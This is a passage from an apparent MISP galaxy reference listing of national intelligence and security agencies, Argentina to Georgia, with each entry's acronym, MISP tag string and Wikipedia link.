The tag is: misp-galaxy:intelligence-agency="Unidad de Inteligencia Financiera (Argentina)"

Unidad de Inteligencia Financiera (Argentina) is also known as:

  • Unidad de Inteligencia Financiera

Table 1649. Table References

Links

https://en.wikipedia.org/wiki/Unidad_de_Inteligencia_Financiera_(Argentina)

Central de Reunión de Inteligencia Militar

Military Intelligence Collection Center (CRIM) – Central de Reunión de Inteligencia Militar

The tag is: misp-galaxy:intelligence-agency="Central de Reunión de Inteligencia Militar"

Table 1650. Table References

Links

https://en.wikipedia.org/wiki/Central_de_Reuni%C3%B3n_de_Inteligencia_Militar

Servicio de Inteligencia del Ejército (Argentina)

Army Intelligence Service (SIE) – Servicio de Inteligencia del Ejército

The tag is: misp-galaxy:intelligence-agency="Servicio de Inteligencia del Ejército (Argentina)"

Servicio de Inteligencia del Ejército (Argentina) is also known as:

  • Servicio de Inteligencia del Ejército

Table 1651. Table References

Links

https://en.wikipedia.org/wiki/Servicio_de_Inteligencia_del_Ej%C3%A9rcito_(Argentina)

Servicio de Inteligencia Naval (Argentina)

Naval Intelligence Service (SIN) – Servicio de Inteligencia Naval

The tag is: misp-galaxy:intelligence-agency="Servicio de Inteligencia Naval (Argentina)"

Servicio de Inteligencia Naval (Argentina) is also known as:

  • Servicio de Inteligencia Naval

Table 1652. Table References

Links

https://en.wikipedia.org/wiki/Servicio_de_Inteligencia_Naval_(Argentina)

Servicio de Inteligencia de la Fuerza Aérea (Argentina)

Air Force Intelligence Service (SIFA) – Servicio de Inteligencia de la Fuerza Aérea

The tag is: misp-galaxy:intelligence-agency="Servicio de Inteligencia de la Fuerza Aérea (Argentina)"

Servicio de Inteligencia de la Fuerza Aérea (Argentina) is also known as:

  • Servicio de Inteligencia de la Fuerza Aérea

Table 1653. Table References

Links

https://en.wikipedia.org/wiki/Servicio_de_Inteligencia_de_la_Fuerza_A%C3%A9rea_(Argentina)

National Security Service (Armenia)

National Security Service (NSS)

The tag is: misp-galaxy:intelligence-agency="National Security Service (Armenia)"

Table 1654. Table References

Links

https://en.wikipedia.org/wiki/National_Security_Service_(Armenia)

Australian Security Intelligence Organisation

Australian Security Intelligence Organisation (ASIO)

The tag is: misp-galaxy:intelligence-agency="Australian Security Intelligence Organisation"

Table 1655. Table References

Links

https://en.wikipedia.org/wiki/Australian_Security_Intelligence_Organisation

Australian Secret Intelligence Service

Australian Secret Intelligence Service (ASIS)

The tag is: misp-galaxy:intelligence-agency="Australian Secret Intelligence Service"

Table 1656. Table References

Links

https://en.wikipedia.org/wiki/Australian_Secret_Intelligence_Service

Australian Signals Directorate

Australian Signals Directorate (ASD)

The tag is: misp-galaxy:intelligence-agency="Australian Signals Directorate"

Table 1657. Table References

Links

https://en.wikipedia.org/wiki/Australian_Signals_Directorate

Australian Geospatial-Intelligence Organisation

Australian Geospatial-Intelligence Organisation (AGO)

The tag is: misp-galaxy:intelligence-agency="Australian Geospatial-Intelligence Organisation"

Table 1658. Table References

Links

https://en.wikipedia.org/wiki/Australian_Geospatial-Intelligence_Organisation

Defence Intelligence Organisation

Defence Intelligence Organisation (DIO)

The tag is: misp-galaxy:intelligence-agency="Defence Intelligence Organisation"

Table 1659. Table References

Links

https://en.wikipedia.org/wiki/Defence_Intelligence_Organisation

Office of National Intelligence (Australia)

Office of National Intelligence (ONI)

The tag is: misp-galaxy:intelligence-agency="Office of National Intelligence (Australia)"

Table 1660. Table References

Links

https://en.wikipedia.org/wiki/Office_of_National_Intelligence_(Australia)

Heeresnachrichtenamt

Heeresnachrichtenamt (HNA): Army Intelligence Office

The tag is: misp-galaxy:intelligence-agency="Heeresnachrichtenamt"

Heeresnachrichtenamt is also known as:

  • Army Intelligence Office

Table 1661. Table References

Links

https://en.wikipedia.org/wiki/Heeresnachrichtenamt

Ministry of Defence (Austria)

Abwehramt (AbwA): Counter-Intelligence Office [2]

The tag is: misp-galaxy:intelligence-agency="Ministry of Defence (Austria)"

Ministry of Defence (Austria) is also known as:

  • Counter-Intelligence Office

Table 1662. Table References

Links

https://en.wikipedia.org/wiki/Ministry_of_Defence_(Austria)#Subordinate_departments

State Security and Intelligence Directorate

Direktion Staatsschutz und Nachrichtendienst (DSN): State Security and Intelligence Directorate

The tag is: misp-galaxy:intelligence-agency="State Security and Intelligence Directorate"

Table 1663. Table References

Links

https://en.wikipedia.org/wiki/State_Security_and_Intelligence_Directorate

State Security Service of the Republic of Azerbaijan

State Security Service (Dövlət Təhlükəsizliyi Xidməti)

The tag is: misp-galaxy:intelligence-agency="State Security Service of the Republic of Azerbaijan"

Table 1664. Table References

Links

https://en.wikipedia.org/wiki/State_Security_Service_of_the_Republic_of_Azerbaijan

Foreign Intelligence Service (Azerbaijan)

Foreign Intelligence Service (Xarici Kəşfiyyat Xidməti)

The tag is: misp-galaxy:intelligence-agency="Foreign Intelligence Service (Azerbaijan)"

Table 1665. Table References

Links

https://en.wikipedia.org/wiki/Foreign_Intelligence_Service_(Azerbaijan)

Financial Monitoring Service (Azerbaijan)

Financial Monitoring Service (Maliyyə Monitorinqi Xidməti)

The tag is: misp-galaxy:intelligence-agency="Financial Monitoring Service (Azerbaijan)"

Table 1666. Table References

Links

https://en.wikipedia.org/wiki/Financial_Monitoring_Service_(Azerbaijan)

Special Branch (Bahamas)

Security and Intelligence Branch (SIB)

The tag is: misp-galaxy:intelligence-agency="Special Branch (Bahamas)"

Table 1667. Table References

Links

https://en.wikipedia.org/wiki/Special_Branch#Bahamas

Financial Intelligence Unit (Bahamas)

Financial Intelligence Unit (FIU)

The tag is: misp-galaxy:intelligence-agency="Financial Intelligence Unit (Bahamas)"

Table 1668. Table References

Links

https://en.wikipedia.org/wiki/Financial_Intelligence_Unit

National Crime Intelligence Agency (NCIA)

National Crime Intelligence Agency (NCIA)

The tag is: misp-galaxy:intelligence-agency="National Crime Intelligence Agency (NCIA)"

National Security Agency (Bahrain)

NSA – National Security Agency

The tag is: misp-galaxy:intelligence-agency="National Security Agency (Bahrain)"

Table 1669. Table References

Links

https://en.wikipedia.org/wiki/National_Security_Agency_(Bahrain)

National Committee for Intelligence Coordination

National Committee for Intelligence Coordination

The tag is: misp-galaxy:intelligence-agency="National Committee for Intelligence Coordination"

Table 1670. Table References

Links

https://en.wikipedia.org/wiki/National_Committee_for_Intelligence_Coordination

National Security Intelligence

National Security Intelligence (NSI)

The tag is: misp-galaxy:intelligence-agency="National Security Intelligence"

Table 1671. Table References

Links

https://en.wikipedia.org/wiki/National_Security_Intelligence

Special Security Force

Special Security Force – Intelligence Bureau (SSF-IB)

The tag is: misp-galaxy:intelligence-agency="Special Security Force"

Table 1672. Table References

Links

https://en.wikipedia.org/wiki/Special_Security_Force

National Security Affairs Cell

National Security Affairs Cell[3]

The tag is: misp-galaxy:intelligence-agency="National Security Affairs Cell"

Table 1673. Table References

Links

https://en.wikipedia.org/wiki/National_Security_Affairs_Cell

Special Branch, Bangladesh Police

Special Branch (SB)

The tag is: misp-galaxy:intelligence-agency="Special Branch, Bangladesh Police"

Table 1674. Table References

Links

https://en.wikipedia.org/wiki/Special_Branch,_Bangladesh_Police

Detective Branch, Bangladesh Police

Detective Branch (DB)

The tag is: misp-galaxy:intelligence-agency="Detective Branch, Bangladesh Police"

Table 1675. Table References

Links

https://en.wikipedia.org/wiki/Detective_Branch,_Bangladesh_Police

Police Bureau of Investigation

Police Bureau of Investigation (PBI)

The tag is: misp-galaxy:intelligence-agency="Police Bureau of Investigation"

Table 1676. Table References

Links

https://en.wikipedia.org/wiki/Police_Bureau_of_Investigation

Criminal Investigation Department (Bangladesh)

Criminal Investigation Department (CID)

The tag is: misp-galaxy:intelligence-agency="Criminal Investigation Department (Bangladesh)"

Table 1677. Table References

Links

https://en.wikipedia.org/wiki/Criminal_Investigation_Department_(Bangladesh)

Counter Terrorism and Transnational Crime

Counter Terrorism and Transnational Crime (CTTC)

The tag is: misp-galaxy:intelligence-agency="Counter Terrorism and Transnational Crime"

Table 1678. Table References

Links

https://en.wikipedia.org/wiki/Counter_Terrorism_and_Transnational_Crime

Rapid Action Battalion

Rapid Action Battalion – Intelligence Wing (RAB-IW)

The tag is: misp-galaxy:intelligence-agency="Rapid Action Battalion"

Table 1679. Table References

Links

https://en.wikipedia.org/wiki/Rapid_Action_Battalion

Directorate General of Forces Intelligence

Directorate General of Forces Intelligence (DGFI)

The tag is: misp-galaxy:intelligence-agency="Directorate General of Forces Intelligence"

Table 1680. Table References

Links

https://en.wikipedia.org/wiki/Directorate_General_of_Forces_Intelligence

Counter Terrorism and Intelligence Bureau

Counter Terrorism and Intelligence Bureau (CTIB)

The tag is: misp-galaxy:intelligence-agency="Counter Terrorism and Intelligence Bureau"

Table 1681. Table References

Links

https://en.wikipedia.org/wiki/Counter_Terrorism_and_Intelligence_Bureau

National Telecommunication Monitoring Centre

National Telecommunication Monitoring Centre (NTMC)

The tag is: misp-galaxy:intelligence-agency="National Telecommunication Monitoring Centre"

Table 1682. Table References

Links

https://en.wikipedia.org/wiki/National_Telecommunication_Monitoring_Centre

National Board of Revenue

Central Intelligence Unit (CIU)

The tag is: misp-galaxy:intelligence-agency="National Board of Revenue"

Table 1683. Table References

Links

https://en.wikipedia.org/wiki/National_Board_of_Revenue

Bangladesh Financial Intelligence Unit

Bangladesh Financial Intelligence Unit (BFIU)

The tag is: misp-galaxy:intelligence-agency="Bangladesh Financial Intelligence Unit"

Table 1684. Table References

Links

https://en.wikipedia.org/wiki/Bangladesh_Financial_Intelligence_Unit

Digital Security Agency

Digital Security Agency

The tag is: misp-galaxy:intelligence-agency="Digital Security Agency"

Table 1685. Table References

Links

https://en.wikipedia.org/wiki/Digital_Security_Agency

Financial Intelligence Unit (Barbados)

Financial Intelligence Unit (FIU)

The tag is: misp-galaxy:intelligence-agency="Financial Intelligence Unit (Barbados)"

Table 1686. Table References

Links

https://en.wikipedia.org/wiki/Financial_Intelligence_Unit

Criminal Investigations Department

Criminal Investigations Department (CID)

The tag is: misp-galaxy:intelligence-agency="Criminal Investigations Department"

Table 1687. Table References

Links

https://en.wikipedia.org/wiki/Criminal_Investigations_Department

State Security Committee of the Republic of Belarus

State Security Committee of the Republic of Belarus (KDB/KGB) (State Security Committee)

The tag is: misp-galaxy:intelligence-agency="State Security Committee of the Republic of Belarus"

Table 1688. Table References

Links

https://en.wikipedia.org/wiki/State_Security_Committee_of_the_Republic_of_Belarus

Belgian State Security Service

VSSE (State Security Service)

The tag is: misp-galaxy:intelligence-agency="Belgian State Security Service"

Table 1689. Table References

Links

https://en.wikipedia.org/wiki/Belgian_State_Security_Service

Belgian General Information and Security Service

ADIV / SGRS (ADIV/SGRS) (General Intelligence and Security Service, military intelligence)

The tag is: misp-galaxy:intelligence-agency="Belgian General Information and Security Service"

Table 1690. Table References

Links

https://en.wikipedia.org/wiki/Belgian_General_Information_and_Security_Service

Intelligence-Security Agency of Bosnia and Herzegovina

Intelligence-Security Agency of Bosnia and Herzegovina (OSA)

The tag is: misp-galaxy:intelligence-agency="Intelligence-Security Agency of Bosnia and Herzegovina"

Table 1691. Table References

Links

https://en.wikipedia.org/wiki/Intelligence-Security_Agency_of_Bosnia_and_Herzegovina

Državna Agencija za Istrage i Zaštitu

Državna Agencija za Istrage i Zaštitu (State Investigation and Protection Agency, SIPA)

The tag is: misp-galaxy:intelligence-agency="Državna Agencija za Istrage i Zaštitu"

Table 1692. Table References

Links

https://en.wikipedia.org/wiki/Dr%C5%BEavna_Agencija_za_Istrage_i_Za%C5%A1titu

Directorate of Intelligence and Security

Directorate on Intelligence and Security Services (DISS – Ministry of State President Espionage & Counter Intelligence unit)

The tag is: misp-galaxy:intelligence-agency="Directorate of Intelligence and Security"

Table 1693. Table References

Links

https://en.wikipedia.org/wiki/Directorate_of_Intelligence_and_Security

Brazilian Intelligence Agency

Brazilian Intelligence Agency (ABIN)

The tag is: misp-galaxy:intelligence-agency="Brazilian Intelligence Agency"

Table 1694. Table References

Links

https://en.wikipedia.org/wiki/Brazilian_Intelligence_Agency

Federal Police Department

Federal Police Department (DPF) (counterintelligence agency)

The tag is: misp-galaxy:intelligence-agency="Federal Police Department"

Table 1695. Table References

Links

https://en.wikipedia.org/wiki/Federal_Police_Department

Institutional Security Bureau

Gabinete de Segurança Institucional (Institutional Security Bureau) (GSI) Responds directly to the president’s office and the armed forces. Coordinates some intelligence operations.

The tag is: misp-galaxy:intelligence-agency="Institutional Security Bureau"

Table 1696. Table References

Links

https://en.wikipedia.org/wiki/Institutional_Security_Bureau

Secretaria da Receita Federal do Brasil

Secretaria da Receita Federal do Brasil (Federal Revenue Secretariat) (RFB) (General Coordination for Research and Investigations - Coordenação-Geral de Pesquisa e Investigação - Copei)

The tag is: misp-galaxy:intelligence-agency="Secretaria da Receita Federal do Brasil"

Table 1697. Table References

Links

https://en.wikipedia.org/wiki/Secretaria_da_Receita_Federal_do_Brasil

Internal Security Department (Brunei)

Internal Security Department (Brunei)[4] (internal)

The tag is: misp-galaxy:intelligence-agency="Internal Security Department (Brunei)"

Table 1698. Table References

Links

https://en.wikipedia.org/wiki/Internal_Security_Department_(Brunei)

National Intelligence Service (Bulgaria)

State Intelligence Agency (Държавна агенция „Разузнаване“ (DAR)) – overseas intelligence gathering service under the supervision of the Council of Ministers of Bulgaria

The tag is: misp-galaxy:intelligence-agency="National Intelligence Service (Bulgaria)"

Table 1699. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Service_(Bulgaria)

State Agency for National Security

State Agency for National Security (Държавна агенция за национална сигурност (DANS)) – national security service under the supervision of the Council of Ministers of Bulgaria

The tag is: misp-galaxy:intelligence-agency="State Agency for National Security"

Table 1700. Table References

Links

https://en.wikipedia.org/wiki/State_Agency_for_National_Security

National Intelligence Service (Burundi)

Service national de renseignement (SNR)

The tag is: misp-galaxy:intelligence-agency="National Intelligence Service (Burundi)"

Table 1701. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Service_(Burundi)

Canadian Security Intelligence Service

Canadian Security Intelligence Service (CSIS)

The tag is: misp-galaxy:intelligence-agency="Canadian Security Intelligence Service"

Table 1702. Table References

Links

https://en.wikipedia.org/wiki/Canadian_Security_Intelligence_Service

Communications Security Establishment Canada

Communications Security Establishment (CSE)

The tag is: misp-galaxy:intelligence-agency="Communications Security Establishment Canada"

Table 1703. Table References

Links

https://en.wikipedia.org/wiki/Communications_Security_Establishment_Canada

Canadian Forces Military Police

Canadian Forces National Counter-Intelligence Unit (DND) operated by the Canadian Forces Military Police Group

The tag is: misp-galaxy:intelligence-agency="Canadian Forces Military Police"

Table 1704. Table References

Links

https://en.wikipedia.org/wiki/Canadian_Forces_Military_Police

Joint Task Force X

Joint Task Force X

The tag is: misp-galaxy:intelligence-agency="Joint Task Force X"

Criminal Intelligence Service Canada

Criminal Intelligence Service Canada (CISC)

The tag is: misp-galaxy:intelligence-agency="Criminal Intelligence Service Canada"

Table 1705. Table References

Links

https://en.wikipedia.org/wiki/Criminal_Intelligence_Service_Canada

Intelligence Branch

Intelligence Branch

The tag is: misp-galaxy:intelligence-agency="Intelligence Branch"

Table 1706. Table References

Links

https://en.wikipedia.org/wiki/Intelligence_Branch

Financial Transactions and Reports Analysis Centre of Canada

Financial Transactions and Reports Analysis Centre of Canada (FINTRAC)

The tag is: misp-galaxy:intelligence-agency="Financial Transactions and Reports Analysis Centre of Canada"

Table 1707. Table References

Links

https://en.wikipedia.org/wiki/Financial_Transactions_and_Reports_Analysis_Centre_of_Canada

Global Affairs Canada

Global Affairs Canada (GAC) Bureau of Intelligence Analysis and Security and Bureau of Economic Intelligence

The tag is: misp-galaxy:intelligence-agency="Global Affairs Canada"

Table 1708. Table References

Links

https://en.wikipedia.org/wiki/Global_Affairs_Canada

Royal Canadian Mounted Police

Royal Canadian Mounted Police (RCMP) Intelligence Division

The tag is: misp-galaxy:intelligence-agency="Royal Canadian Mounted Police"

Table 1709. Table References

Links

https://en.wikipedia.org/wiki/Royal_Canadian_Mounted_Police

Canada Border Services Agency

Canada Border Services Agency (CBSA) Immigrations Intelligence

The tag is: misp-galaxy:intelligence-agency="Canada Border Services Agency"

Table 1710. Table References

Links

https://en.wikipedia.org/wiki/Canada_Border_Services_Agency

Canadian Coast Guard

Canadian Coast Guard (CCG)

The tag is: misp-galaxy:intelligence-agency="Canadian Coast Guard"

Table 1711. Table References

Links

https://en.wikipedia.org/wiki/Canadian_Coast_Guard

Agence nationale de sécurité

Agence nationale de sécurité (ANS)

The tag is: misp-galaxy:intelligence-agency="Agence nationale de sécurité"

Table 1712. Table References

Links

https://en.wikipedia.org/wiki/Agence_nationale_de_s%C3%A9curit%C3%A9

Agencia Nacional de Inteligencia

National Intelligence Agency (ANI) – Agencia Nacional de Inteligencia

The tag is: misp-galaxy:intelligence-agency="Agencia Nacional de Inteligencia"

Table 1713. Table References

Links

https://en.wikipedia.org/wiki/Agencia_Nacional_de_Inteligencia

610 Office

610 Office

The tag is: misp-galaxy:intelligence-agency="610 Office"

Table 1714. Table References

Links

https://en.wikipedia.org/wiki/610_Office

International Liaison Department of the Chinese Communist Party

International Department (ID)

The tag is: misp-galaxy:intelligence-agency="International Liaison Department of the Chinese Communist Party"

Table 1715. Table References

Links

https://en.wikipedia.org/wiki/International_Liaison_Department_of_the_Chinese_Communist_Party

United Front Work Department

United Front Work Department (UFWD)

The tag is: misp-galaxy:intelligence-agency="United Front Work Department"

Table 1716. Table References

Links

https://en.wikipedia.org/wiki/United_Front_Work_Department

Joint Staff Department of the Central Military Commission Intelligence Bureau

Intelligence Bureau of the General Staff aka 2nd Bureau

The tag is: misp-galaxy:intelligence-agency="Joint Staff Department of the Central Military Commission Intelligence Bureau"

Table 1717. Table References

Links

https://en.wikipedia.org/wiki/Joint_Staff_Department_of_the_Central_Military_Commission_Intelligence_Bureau

People’s Liberation Army Air Force

People’s Liberation Army Air Force (PLAAF)

The tag is: misp-galaxy:intelligence-agency="People’s Liberation Army Air Force"

Table 1718. Table References

Links

https://en.wikipedia.org/wiki/People%27s_Liberation_Army_Air_Force

People’s Liberation Army General Political Department

People’s Liberation Army General Political Department (GND)

The tag is: misp-galaxy:intelligence-agency="People’s Liberation Army General Political Department"

Table 1719. Table References

Links

https://en.wikipedia.org/wiki/People%27s_Liberation_Army_General_Political_Department

People’s Liberation Army General Staff Department

People’s Liberation Army General Staff Department (GSD)

The tag is: misp-galaxy:intelligence-agency="People’s Liberation Army General Staff Department"

Table 1720. Table References

Links

https://en.wikipedia.org/wiki/People%27s_Liberation_Army_General_Staff_Department

PLA Unit 61398

PLA Unit 61398 aka APT 1

The tag is: misp-galaxy:intelligence-agency="PLA Unit 61398"

Table 1721. Table References

Links

https://en.wikipedia.org/wiki/PLA_Unit_61398

State Administration of Foreign Experts Affairs

State Administration of Foreign Experts Affairs (SAFEA)

The tag is: misp-galaxy:intelligence-agency="State Administration of Foreign Experts Affairs"

Table 1722. Table References

Links

https://en.wikipedia.org/wiki/State_Administration_of_Foreign_Experts_Affairs

Ministry of Public Security (China)

Ministry of Public Security (MPS)

The tag is: misp-galaxy:intelligence-agency="Ministry of Public Security (China)"

Table 1723. Table References

Links

https://en.wikipedia.org/wiki/Ministry_of_Public_Security_(China)

Ministry of State Security (China)

Ministry of State Security (MSS)

The tag is: misp-galaxy:intelligence-agency="Ministry of State Security (China)"

Table 1724. Table References

Links

https://en.wikipedia.org/wiki/Ministry_of_State_Security_(China)

Office for Safeguarding National Security of the CPG in the HKSAR

Office for Safeguarding National Security of the CPG in the HKSAR (CPGNSO)

The tag is: misp-galaxy:intelligence-agency="Office for Safeguarding National Security of the CPG in the HKSAR"

Table 1725. Table References

Links

https://en.wikipedia.org/wiki/Office_for_Safeguarding_National_Security_of_the_CPG_in_the_HKSAR

National Intelligence Directorate (Colombia)

Dirección Nacional de Inteligencia (DNI)

The tag is: misp-galaxy:intelligence-agency="National Intelligence Directorate (Colombia)"

Table 1726. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Directorate_(Colombia)

National Intelligence Agency (Democratic Republic of the Congo)

National Intelligence Agency (ANR)

The tag is: misp-galaxy:intelligence-agency="National Intelligence Agency (Democratic Republic of the Congo)"

Table 1727. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Agency_(Democratic_Republic_of_the_Congo)

DEMIAP

General Staff of Military intelligence (ex-DEMIAP)

The tag is: misp-galaxy:intelligence-agency="DEMIAP"

Table 1728. Table References

Links

https://en.wikipedia.org/wiki/DEMIAP

Security and Intelligence Agency

Sigurnosno-obavještajna agencija (SOA) (Security and Intelligence Agency)

The tag is: misp-galaxy:intelligence-agency="Security and Intelligence Agency"

Table 1729. Table References

Links

https://en.wikipedia.org/wiki/Security_and_Intelligence_Agency

Vojna sigurnosno-obavještajna agencija

Vojna sigurnosno-obavještajna agencija (VSOA) (Military Security and Intelligence Agency)

The tag is: misp-galaxy:intelligence-agency="Vojna sigurnosno-obavještajna agencija"

Table 1730. Table References

Links

https://en.wikipedia.org/wiki/Vojna_sigurnosno-obavje%C5%A1tajna_agencija

Dirección de Contra-Inteligencia Militar

Military Counterintelligence Directorate

The tag is: misp-galaxy:intelligence-agency="Dirección de Contra-Inteligencia Militar"

Table 1731. Table References

Links

https://en.wikipedia.org/wiki/Direcci%C3%B3n_de_Contra-Inteligencia_Militar

Intelligence Directorate

Dirección General de Inteligencia (DGI)

The tag is: misp-galaxy:intelligence-agency="Intelligence Directorate"

Table 1732. Table References

Links

https://en.wikipedia.org/wiki/Intelligence_Directorate

Cyprus Intelligence Service

Cyprus Intelligence Service (CIS) (Κυπριακή Υπηρεσία Πληροφοριών)(ΚΥΠ), (former Central Intelligence Service-KYP)

The tag is: misp-galaxy:intelligence-agency="Cyprus Intelligence Service"

Table 1733. Table References

Links

https://en.wikipedia.org/wiki/Cyprus_Intelligence_Service

Security Information Service

Security Information Service (Bezpečnostní informační služba, BIS)

The tag is: misp-galaxy:intelligence-agency="Security Information Service"

Table 1734. Table References

Links

https://en.wikipedia.org/wiki/Security_Information_Service

Office for Foreign Relations and Information

Office for Foreign Relations and Information (Úřad pro zahraniční styky a informace, ÚZSI)

The tag is: misp-galaxy:intelligence-agency="Office for Foreign Relations and Information"

Table 1735. Table References

Links

https://en.wikipedia.org/wiki/Office_for_Foreign_Relations_and_Information

Military Intelligence (Czech Republic)

Military Intelligence (Vojenské zpravodajství, VZ)

The tag is: misp-galaxy:intelligence-agency="Military Intelligence (Czech Republic)"

Table 1736. Table References

Links

https://en.wikipedia.org/wiki/Military_Intelligence_(Czech_Republic)

Danish Security and Intelligence Service

Danish Security and Intelligence Service (Politiets Efterretningstjeneste (PET)).

The tag is: misp-galaxy:intelligence-agency="Danish Security and Intelligence Service"

Table 1737. Table References

Links

https://en.wikipedia.org/wiki/Danish_Security_and_Intelligence_Service

Danish Defence Intelligence Service

Danish Defence Intelligence Service (Forsvarets Efterretningstjeneste (FE)).

The tag is: misp-galaxy:intelligence-agency="Danish Defence Intelligence Service"

Table 1738. Table References

Links

https://en.wikipedia.org/wiki/Danish_Defence_Intelligence_Service

Army Intelligence Center

Army Intelligence Center (Efterretningsregimentet (EFR)).

The tag is: misp-galaxy:intelligence-agency="Army Intelligence Center"

Table 1739. Table References

Links

https://en.wikipedia.org/wiki/Army_Intelligence_Center

Egyptian General Intelligence Directorate

Gihaz al-Mukhabarat al-Amma (GIS) (General Intelligence Service)

The tag is: misp-galaxy:intelligence-agency="Egyptian General Intelligence Directorate"

Table 1740. Table References

Links

https://en.wikipedia.org/wiki/Egyptian_General_Intelligence_Directorate

Military intelligence and reconnaissance (Egypt)

Idarat al-Mukhabarat al-Harbyya wa al-Istitla (OMIR) (Office of Military Intelligence and Reconnaissance)

The tag is: misp-galaxy:intelligence-agency="Military intelligence and reconnaissance (Egypt)"

Table 1741. Table References

Links

https://en.wikipedia.org/wiki/Military_intelligence_and_reconnaissance_(Egypt)

Egyptian Homeland security

Al-amn al-Watani (HS) (Homeland Security)

The tag is: misp-galaxy:intelligence-agency="Egyptian Homeland security"

Table 1742. Table References

Links

https://en.wikipedia.org/wiki/Egyptian_Homeland_security

National Security Office (Eritrea)

National Security Office

The tag is: misp-galaxy:intelligence-agency="National Security Office (Eritrea)"

Table 1743. Table References

Links

https://en.wikipedia.org/wiki/National_Security_Office_(Eritrea)

Estonian Internal Security Service

Estonian Internal Security Service (KaPo) (Kaitsepolitseiamet)

The tag is: misp-galaxy:intelligence-agency="Estonian Internal Security Service"

Estonian Internal Security Service is also known as:

  • Kaitsepolitseiamet

Table 1744. Table References

Links

https://en.wikipedia.org/wiki/Estonian_Internal_Security_Service

Estonian Foreign Intelligence Service

Estonian Foreign Intelligence Service (VLA) (Välisluureamet)

The tag is: misp-galaxy:intelligence-agency="Estonian Foreign Intelligence Service"

Estonian Foreign Intelligence Service is also known as:

  • VLA

  • Välisluureamet

Table 1745. Table References

Links

https://en.wikipedia.org/wiki/Estonian_Foreign_Intelligence_Service

National Intelligence and Security Service (Ethiopia)

National Intelligence and Security Service (NISS)

The tag is: misp-galaxy:intelligence-agency="National Intelligence and Security Service (Ethiopia)"

Table 1746. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_and_Security_Service_(Ethiopia)

Finnish Defence Intelligence Agency

Finnish Defence Intelligence Agency – Puolustusvoimien tiedustelulaitos (PVTIEDL) / Försvarsmaktens underrättelsetjänst

The tag is: misp-galaxy:intelligence-agency="Finnish Defence Intelligence Agency"

Finnish Defence Intelligence Agency is also known as:

  • Puolustusvoimien tiedustelulaitos (PVTIEDL)

  • Försvarsmaktens underrättelsetjänst

Table 1747. Table References

Links

https://en.wikipedia.org/wiki/Finnish_Defence_Intelligence_Agency

Intelligence Division (Finland)

Defense Command Intelligence Division – Pääesikunnan tiedusteluosasto (PE TIEDOS) / Huvudstabens underrättelseavdelning)

The tag is: misp-galaxy:intelligence-agency="Intelligence Division (Finland)"

Intelligence Division (Finland) is also known as:

  • Pääesikunnan tiedusteluosasto (PE TIEDOS) / Huvudstabens underrättelseavdelning)

Table 1748. Table References

Links

https://en.wikipedia.org/wiki/Intelligence_Division_(Finland)

Finnish Security Intelligence Service

Finnish Security Intelligence Service (SUPO) – Suojelupoliisi / Skyddspolisen

The tag is: misp-galaxy:intelligence-agency="Finnish Security Intelligence Service"

Finnish Security Intelligence Service is also known as:

  • Suojelupoliisi / Skyddspolisen

Table 1749. Table References

Links

https://en.wikipedia.org/wiki/Finnish_Security_Intelligence_Service

National Centre for Counter Terrorism

National Centre for Counter Terrorism (CNRLT, Coordination nationale du renseignement et de la lutte contre le terrorisme)

The tag is: misp-galaxy:intelligence-agency="National Centre for Counter Terrorism"

National Centre for Counter Terrorism is also known as:

  • Coordination nationale du renseignement et de la lutte contre le terrorisme

Table 1750. Table References

Links

https://en.wikipedia.org/wiki/National_Centre_for_Counter_Terrorism

General Directorate for Internal Security

General Directorate for Internal Security (DGSI; Direction générale de la sécurité intérieure) – Domestic counter-terrorism and counter-espionage intelligence.

The tag is: misp-galaxy:intelligence-agency="General Directorate for Internal Security"

General Directorate for Internal Security is also known as:

  • Direction générale de la sécurité intérieure

Table 1751. Table References

Links

https://en.wikipedia.org/wiki/General_Directorate_for_Internal_Security

direction nationale du renseignement territorial (DNRT)

direction nationale du renseignement territorial (DNRT)

The tag is: misp-galaxy:intelligence-agency="direction nationale du renseignement territorial (DNRT)"

direction nationale du renseignement territorial (DNRT) is also known as:

  • direction nationale du renseignement territorial

Sous-direction anti-terroriste (SDAT)

Sous-direction anti-terroriste (SDAT)

The tag is: misp-galaxy:intelligence-agency="Sous-direction anti-terroriste (SDAT)"

Sous-direction anti-terroriste (SDAT) is also known as:

  • Sous-direction anti-terroriste

Directorate-General for External Security

Directorate-General for External Security (DGSE; Direction générale de la sécurité extérieure) – Foreign intelligence relating to national security.

The tag is: misp-galaxy:intelligence-agency="Directorate-General for External Security"

Directorate-General for External Security is also known as:

  • Direction générale de la sécurité extérieure

Table 1752. Table References

Links

https://en.wikipedia.org/wiki/Directorate-General_for_External_Security

DRSD

Direction du Renseignement et de la Sécurité de la Défense (DRSD; Direction du Renseignement et de la Sécurité de la Défense) – Foreign intelligence relating to national security.

The tag is: misp-galaxy:intelligence-agency="DRSD"

DRSD is also known as:

  • Direction du Renseignement et de la Sécurité de la Défense

Table 1753. Table References

Links

https://en.wikipedia.org/wiki/DRSD

Direction du renseignement militaire

Directorate of Military Intelligence (DRM; Direction du renseignement militaire) – Military intelligence.

The tag is: misp-galaxy:intelligence-agency="Direction du renseignement militaire"

Table 1754. Table References

Links

https://en.wikipedia.org/wiki/Direction_du_renseignement_militaire

Tracfin

Tracfin

The tag is: misp-galaxy:intelligence-agency="Tracfin"

Table 1755. Table References

Links

https://en.wikipedia.org/wiki/Tracfin

Direction Nationale du Renseignement et des Enquêtes Douanières

Direction Nationale du Renseignement et des Enquêtes Douanières (DNRED)

The tag is: misp-galaxy:intelligence-agency="Direction Nationale du Renseignement et des Enquêtes Douanières"

Table 1756. Table References

Links

https://en.wikipedia.org/wiki/Direction_Nationale_du_Renseignement_et_des_Enqu%C3%AAtes_Douani%C3%A8res

State Intelligence Services (the Gambia)

State Intelligence Services (the Gambia) (SIS)

The tag is: misp-galaxy:intelligence-agency="State Intelligence Services (the Gambia)"

Table 1757. Table References

Links

https://en.wikipedia.org/wiki/State_Intelligence_Services_(the_Gambia)

State Security Service (Georgia)

State Security Service (SSSG) − სახელმწიფო უშიშროების სამსახური

The tag is: misp-galaxy:intelligence-agency="State Security Service (Georgia)"

State Security Service (Georgia) is also known as:

  • სახელმწიფო უშიშროების სამსახური

Table 1758. Table References

Links

https://en.wikipedia.org/wiki/State_Security_Service_(Georgia)

Georgian Intelligence Service

Georgian Intelligence Service (GIS) − საქართველოს დაზვერვის სამსახური

